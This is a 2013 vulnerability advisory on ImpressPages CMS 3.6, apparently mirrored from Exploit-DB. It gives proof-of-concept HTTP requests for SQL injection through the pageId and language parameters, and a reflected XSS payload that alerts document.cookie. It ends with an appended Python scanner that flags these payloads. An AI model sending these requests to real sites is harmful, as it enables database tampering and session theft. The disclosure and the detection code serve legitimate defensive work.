ImpressPages CMS 3.6 – Multiple Cross-Site Scripting / SQL Injection Vulnerabilities

    Author: LiquidWorm
    Date: 2013-10-31
    Category:
    Platform:
    Source: https://www.exploit-db.com/exploits/29318/
    
    ImpressPages CMS v3.6 Multiple XSS/SQLi Vulnerabilities
    
    
    Vendor: ImpressPages UAB
    Product web page: http://www.impresspages.org
    Affected version: 3.6
    
    Summary: ImpressPages CMS is an open source web content
    management system with a revolutionary drag & drop interface.
    
    Desc: Input passed via several parameters is not properly
    sanitized before being returned to the user or used in SQL
    queries. This can be exploited to manipulate SQL queries by
    injecting arbitrary SQL code, and to execute arbitrary HTML/script
    code in a user's browser session in the context of an affected site.
    
    Tested on: Microsoft Windows 7 Ultimate SP1 (EN)
               Apache 2.4.2
               PHP 5.4.7
               MySQL 5.5.25a
    
    
    Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
    @zeroscience
    
    
    Advisory ID: ZSL-2013-5157
    Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5157.php
    
    Vendor: http://www.impresspages.org/blog/impresspages-cms-3-7-is-mobile-as-never-before/
    
    
    
    12.10.2013
    
    --
    
    ==================================
    
    SQL Injection: (pageId param)
    
    POST /impresspages/?cms_action=manage HTTP/1.1
    Host: localhost
    Proxy-Connection: keep-alive
    Content-Length: 124
    Accept: application/json, text/javascript, */*; q=0.01
    Origin: http://localhost
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://localhost/impresspages/?cms_action=manage
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
    
    g=standard&m=content_management&a=getPageOptionsHtml&securityToken=c029f7293955df089676b78af8222d2a&pageId=64'&zoneName=menu1
    
    
    ==================================
    
    SQL Injection: (language param)
    
    POST /impresspages/admin.php?module_id=436&action=export&security_token=381cb48be4ed7445a9e6303e64ae87ac HTTP/1.1
    Host: localhost
    Proxy-Connection: keep-alive
    Content-Length: 404
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Origin: http://localhost
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundarybBHOjmAcICeilnDe
    Referer: http://localhost/impresspages/admin.php?module_id=436&security_token=381cb48be4ed7445a9e6303e64ae87ac
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
    
    ------WebKitFormBoundarybBHOjmAcICeilnDe
    Content-Disposition: form-data; name="language"
    
    344'
    ------WebKitFormBoundarybBHOjmAcICeilnDe
    Content-Disposition: form-data; name="spec_security_code"
    
    9f1ff00ea8fd9fd8f2d421ba5ec45a18
    ------WebKitFormBoundarybBHOjmAcICeilnDe
    Content-Disposition: form-data; name="spec_rand_name"
    
    lib_php_form_standard_2_
    ------WebKitFormBoundarybBHOjmAcICeilnDe--
    
    
    ==================================
    
    Reflected XSS POST parameters:
    
    - files[0][file]
    - instanceId
    - pageOptions[buttonTitle]
    - pageOptions[createdOn]
    - pageOptions[description]
    - pageOptions[keywords]
    - pageOptions[lastModified]
    - pageOptions[layout]
    - pageOptions[pageTitle]
    - pageOptions[redirectURL]
    - pageOptions[rss]
    - pageOptions[type]
    - pageOptions[url]
    - pageOptions[visible]
    - revisionId
    - widgetName
    - pageSize[0]
    - page[0]
    - road[]
    
    
    ==================================
    
    POST /impresspages/?cms_action=manage HTTP/1.1
    Host: localhost
    Proxy-Connection: keep-alive
    Content-Length: 155
    Accept: application/json, text/javascript, */*; q=0.01
    Origin: http://localhost
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.69 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Referer: http://localhost/impresspages/?cms_action=manage
    Accept-Encoding: gzip,deflate,sdch
    Accept-Language: en-US,en;q=0.8
    Cookie: ses819=k7e9hu9pk4ol4h9l0lbt5q73u1
    
    g=standard&m=content_management&a=deleteWidget&securityToken=c029f7293955df089676b78af8222d2a&instanceId=<img%20src%3da%20onerror%3dalert(document.cookie)>
    
    ...
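As an added example, not part of this advisory or of the ImpressPages code base, the Python below scans captured requests for the parameter names listed above and flags the patterns the PoC requests rely on: a quote character in the two SQL injection parameters (pageId, language) and a tag or event handler in the reflected XSS parameters. The parameter names are taken from the advisory; the regexes, the minimal multipart parser and the sample requests are constructed for this example and are assumptions, not the advisory's own data.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Parameter names below come from advisory ZSL-2013-5157 (ImpressPages CMS 3.6);
# the regexes are heuristics constructed for this example, not from the advisory.
SQLI_PARAMS = {"pageId", "language"}
XSS_PARAMS = {"files[0][file]", "instanceId", "revisionId", "widgetName",
              "pageSize[0]", "page[0]", "road[]"} | {"pageOptions[%s]" % f for f in (
    "buttonTitle createdOn description keywords lastModified layout pageTitle "
    "redirectURL rss type url visible").split()}
SQLI_RE = re.compile(r"['\"]|--|/\*|\b(union|select|sleep|benchmark)\b", re.I)
XSS_RE = re.compile(r"<\s*/?\w+|\bon\w+\s*=|javascript:", re.I)
CHECKS = [("sqli", SQLI_PARAMS, SQLI_RE), ("xss", XSS_PARAMS, XSS_RE)]

def parse_multipart(body: str, boundary: str) -> dict:
    """Minimal multipart/form-data parser for text fields (no file parts)."""
    fields = {}
    for part in body.split("--" + boundary)[1:-1]:   # drop preamble and epilogue
        header, _, value = part.partition("\r\n\r\n")
        if m := re.search(r'name="([^"]+)"', header):
            fields.setdefault(m.group(1), []).append(value.rstrip("\r\n"))
    return fields

def scan_request(path: str, content_type: str, body: str) -> list:
    """Return (param, kind, decoded value) for every suspicious parameter value."""
    params = parse_qs(urlsplit(path).query, keep_blank_values=True)
    if content_type.startswith("multipart/form-data"):
        # a multipart Content-Type without a boundary is malformed; let it raise
        extra = parse_multipart(body, re.search(r"boundary=(\S+)", content_type).group(1))
    else:
        extra = parse_qs(body, keep_blank_values=True)
    for name, values in extra.items():
        params.setdefault(name, []).extend(values)
    return [(name, kind, v) for name, vals in params.items() for v in vals
            for kind, names, rx in CHECKS if name in names and rx.search(v)]

# Constructed sample requests modelled on the advisory's PoC traffic.
FORM = "application/x-www-form-urlencoded"
SAMPLES = [
    ("/impresspages/?cms_action=manage", FORM, "a=getPageOptionsHtml&pageId=64'"),
    ("/impresspages/?cms_action=manage", FORM,
     "a=deleteWidget&instanceId=<img%20src%3da%20onerror%3dalert(1)>"),
    ("/impresspages/admin.php?module_id=436&action=export",
     "multipart/form-data; boundary=----WebKitFormBoundaryTEST",
     '------WebKitFormBoundaryTEST\r\nContent-Disposition: form-data; name="language"'
     "\r\n\r\n344'\r\n------WebKitFormBoundaryTEST--\r\n"),
    ("/impresspages/?cms_action=manage", FORM, "a=getPageOptionsHtml&pageId=64"),
]

if __name__ == "__main__":
    print([scan_request(*s) or "clean" for s in SAMPLES])
```

Only values of the listed parameters are checked, so an apostrophe in a free-text field such as pageOptions[description] does not trigger the SQL injection rule; tune the regexes to your own traffic before using them as an alert source.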